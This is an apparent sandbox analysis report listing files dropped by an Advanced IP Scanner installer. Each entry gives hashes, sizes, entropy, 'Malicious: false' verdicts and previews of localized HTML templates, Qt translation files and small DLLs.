SHA-512:	2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Durum:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..letim sistemi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.retici:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kullan.c.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.r:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tarih:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Yorumlar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Hizmet</center></b></td><td><b><center>Ayr.nt.lar</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_uk_ua.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.138597371923522
Encrypted:	false
SSDEEP:	24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
MD5:	280FFC27B6422BD266F49BE7798DB4D9
SHA1:	203F0E4D50B553133531D25727397417BBABAA7B
SHA-256:	5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
SHA-512:	B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_vi_vn.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1184
Entropy (8bit):	5.02025670297611
Encrypted:	false
SSDEEP:	24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
MD5:	5B2A97F16B2382930301E6C2C8BFF7A7
SHA1:	C66302E72DD2C5561D6187FA4276D78063915693
SHA-256:	EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
SHA-512:	48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t

C:\Program Files (x86)\Advanced IP Scanner\details_panel_zh_cn.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1142
Entropy (8bit):	5.0337822285325755
Encrypted:	false
SSDEEP:	24:lFoSssuSVIXqFHGqP97iV0Kt5RGDqReEhyv:HXssRVIXqFHGqP900U2Dws
MD5:	34B8B376FC335077A97D5C218E01E14D
SHA1:	45D32290176CF33D77EA0FE8F40D0BC3D6D6F2C8
SHA-256:	3733D0B7A0B799AD19140DCB4D22C8B024E102D7C2D44AF1D6CCCAAB9920CF12
SHA-512:	7A65D54FB9EE70B953A83E960337C6E4352207D82F99F041E29A57E9BEB8C80891295A39F038F8E463362506BDA375046891D1ECFEC075CD6FD5603933382FB3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>..</center></b></

C:\Program Files (x86)\Advanced IP Scanner\details_panel_zh_tw.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	5.068076577523285
Encrypted:	false
SSDEEP:	24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
MD5:	1E41F2F1C303F750C96681515894C7B4
SHA1:	A6B4E2EC874030D50A0156E4A6CF2EF952F11455
SHA-256:	350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
SHA-512:	ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent

C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.948212808065758
Encrypted:	false
SSDEEP:	192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
MD5:	39D81596A7308E978D67AD6FDCCDD331
SHA1:	A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
SHA-256:	3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
SHA-512:	0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-0Q9LC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28132
Entropy (8bit):	4.6803756692053184
Encrypted:	false
SSDEEP:	384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
MD5:	2DB27B87481EDE8D4FE8C92431A5C5AC
SHA1:	0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
SHA-256:	A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
SHA-512:	B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G...y......y......%..%...0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.\|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I

C:\Program Files (x86)\Advanced IP Scanner\is-110SH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26334
Entropy (8bit):	5.237840743757654
Encrypted:	false
SSDEEP:	384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
MD5:	6AB50593778FB5BD5D5422BDD90595E6
SHA1:	282946268660F41A7484BF19C30B7B958F6A82D4
SHA-256:	132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
SHA-512:	359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
Malicious:	false
Preview:	<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A...y......y......%..!...0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.\|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-125IE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1177
Entropy (8bit):	4.903797892947706
Encrypted:	false
SSDEEP:	24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
MD5:	5F29203D51A1A790B22063DE29E377AC
SHA1:	C0EDB2A7108E532E66D7B730466022403C64F50D
SHA-256:	C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
SHA-512:	D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

C:\Program Files (x86)\Advanced IP Scanner\is-1CO2Q.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.85707182260681
Encrypted:	false
SSDEEP:	12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
MD5:	1AD783BD4AF434D47BD69AB818A91DFA
SHA1:	8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
SHA-256:	2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
SHA-512:	1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

C:\Program Files (x86)\Advanced IP Scanner\is-1KSOB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28669
Entropy (8bit):	4.635479137963866
Encrypted:	false
SSDEEP:	384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
MD5:	A5D24342E9B32AD9714C091BB135D180
SHA1:	7B193290CFE8190B60122C2219972512695E5D68
SHA-256:	2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
SHA-512:	140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
Malicious:	false
Preview:	<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK..y......y......%..&...0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.\|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V.....R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-1KTKB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1256
Entropy (8bit):	5.1672203710221565
Encrypted:	false
SSDEEP:	24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
MD5:	38E55188530EE1FC3B88A22697957911
SHA1:	BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
SHA-256:	EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
SHA-512:	F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\is-1Q5FL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	29651
Entropy (8bit):	5.330350785151233
Encrypted:	false
SSDEEP:	768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
MD5:	E1A891010B901FE6055532E588E20293
SHA1:	167F62B548D6628FC1B989F6FD232BD362B59C23
SHA-256:	B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
SHA-512:	AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
Malicious:	false
Preview:	<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K...y...,..y......%..'...0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.\|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-21C1V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.788912446448768
Encrypted:	false
SSDEEP:	24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
MD5:	FBA663967DF5DD4AB38D38DA1362598E
SHA1:	9557B768C03EB179FDEBB5F74724985F51685203
SHA-256:	466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
SHA-512:	427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

C:\Program Files (x86)\Advanced IP Scanner\is-25QT4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.960788331628294
Encrypted:	false
SSDEEP:	192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
MD5:	37DA7F6961082DD96A537235DD89B114
SHA1:	DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
SHA-256:	6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
SHA-512:	AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-2QNLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26514
Entropy (8bit):	5.365287004508335
Encrypted:	false
SSDEEP:	384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
MD5:	31966D909B8293307AC3545ACA55CD13
SHA1:	1B49E43C0109445BA5068E2ED8422CB308D99B12
